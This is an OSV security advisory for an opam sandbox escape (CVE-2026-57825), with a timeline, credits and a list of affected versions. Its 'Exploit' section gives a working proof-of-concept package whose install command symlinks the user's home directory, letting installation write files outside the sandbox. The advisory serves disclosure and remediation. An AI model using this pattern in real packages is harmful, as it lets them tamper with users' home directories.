OSEC-2026-10

See a problem?
Import Source
https://github.com/ocaml/security-advisories/blob/generated-osv/2026/OSEC-2026-10.json
JSON Data
https://api.osv.dev/v1/vulns/OSEC-2026-10
Aliases
  • CVE-2026-57825
Published
2026-07-07T12:00:00Z
Modified
2026-07-09T13:00:03.728089492Z
Severity
  • 5.7 (Medium) CVSS_V3 - CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:H/A:N CVSS Calculator
Summary
opam install sandbox escape using symlinks
Details

Summary

Installing files through .install files do not check symlinks resolution of the target path, and so can bypass sandboxing.

Exploit

Let's imagine a test package whose test.install file looks like the following:

share_root: [
  "test" {"blah/pwnd"}
]

and test.opam file:

opam-version: "2.0"
install: ["sh" "-c" "ln -s \"$HOME\" \"%{share}%/blah\""]

Installing this package will write the pwnd file in the home directory of the current user, bypassing sandboxing.

Timeline

  • 2026-05-15: Kate reported the issue to the rest of the opam team and the OCaml Security team
  • 2026-06-22: Nathan wrote a fix which was then reviewed by Raja and refined over the next 2 weeks
  • 2026-07-08: opam 2.5.2 was released with the fix
Database specific
{
    "human_link": "https://github.com/ocaml/security-advisories/tree/main/advisories/2026/OSEC-2026-10.md",
    "osv": "https://github.com/ocaml/security-advisories/tree/generated-osv/2026/OSEC-2026-10.json",
    "cwe": [
        "CWE-693"
    ]
}
References
Credits
    • Kate Deplaix - REPORTER
    • Nathan Rebours - REMEDIATION_DEVELOPER
    • Raja Boujbel - REMEDIATION_REVIEWER
    • Hannes Mehnert - COORDINATOR

Affected packages

opam / opam-devel

Package

Name
opam-devel
Purl
pkg:opam/opam-devel

Affected ranges

Type
ECOSYSTEM
Events
Introduced
0Unknown introduced version / All previous versions are affected
Fixed
2.5.2
Type
GIT
Repo
https://github.com/ocaml/opam
Events
Introduced
0 Unknown introduced commit / All previous commits are affected
Fixed
Type
GIT
Repo
https://github.com/ocaml/opam
Events
Introduced
0 Unknown introduced commit / All previous commits are affected
Fixed

Affected versions

0.*
0.2
0.3
0.3.1
0.4.0
0.5.0
0.6.0
0.7.2
0.7.3
0.7.4
0.7.5
0.7.6
0.7.7
0.8.0
0.8.1
0.9.0
0.9.1
0.9.2
0.9.3
0.9.4
0.9.5
0.9.6
1.*
1.0.0
1.1.0-RC
1.1.0-beta
1.2.0
1.2.0-beta
1.2.0-beta2
1.2.0-beta3
1.2.0-beta4
1.2.0-rc1
1.2.0-rc2
1.2.0-rc3
1.2.0-rc4
1.2.1
1.2.1-beta
1.2.1-beta2
1.2.1-beta3
1.2.1-rc
1.2.1-rc2
2.*
2.0~alpha5
2.0-alpha
2.0-alpha4
2.0-alpha5
2.0.0~beta
2.0.0~beta3
2.0.0~beta3.1
2.0.0~beta5
2.0.0~rc
2.0.0~rc2
2.0.0~rc3
2.0.0
2.0.0-beta
2.0.0-beta2
2.0.0-beta3
2.0.0-beta3.1
2.0.0-beta4
2.0.0-beta5
2.0.0-beta6
2.0.0-rc
2.0.0-rc3
2.0.0-rc4
2.0.1
2.0.2
2.0.3
2.0.4
2.0.5
2.0.6
2.0.7
2.0.8
2.0.9
2.0.10
2.1.0~beta2
2.1.0~beta4
2.1.0~rc
2.1.0~rc2
2.1.0
2.1.0-alpha
2.1.0-alpha2
2.1.0-alpha3
2.1.0-beta
2.1.0-beta4
2.1.0-rc
2.1.1
2.1.2
2.1.3
2.1.4
2.1.5
2.1.6
2.2.0~alpha
2.2.0~alpha2
2.2.0~alpha3
2.2.0~beta1
2.2.0~beta2
2.2.0~beta3
2.2.0~rc1
2.2.0
2.2.0-alpha
2.2.0-alpha2
2.2.0-alpha3
2.2.0-beta1
2.2.0-beta2
2.2.0-beta3
2.2.0-rc1
2.2.1
2.3.0~alpha1
2.3.0~beta1
2.3.0~beta2
2.3.0~rc1
2.3.0
2.3.0-alpha1
2.4.0~alpha1
2.4.0~alpha2
2.4.0~beta1
2.4.0~rc1
2.4.0
2.4.0-alpha1
2.4.0-alpha2
2.4.0-beta1
2.4.0-rc1
2.4.1
2.5.0~alpha1
2.5.0~beta1
2.5.0~rc1
2.5.0
2.5.0-alpha1
2.5.0-beta1
2.5.0-rc1
2.5.1
Other
latest-test

Ecosystem specific

{
    "opam_constraint": "opam-devel {< \"2.5.2\"}"
}

Database specific

source
"https://github.com/ocaml/security-advisories/blob/generated-osv/2026/OSEC-2026-10.json"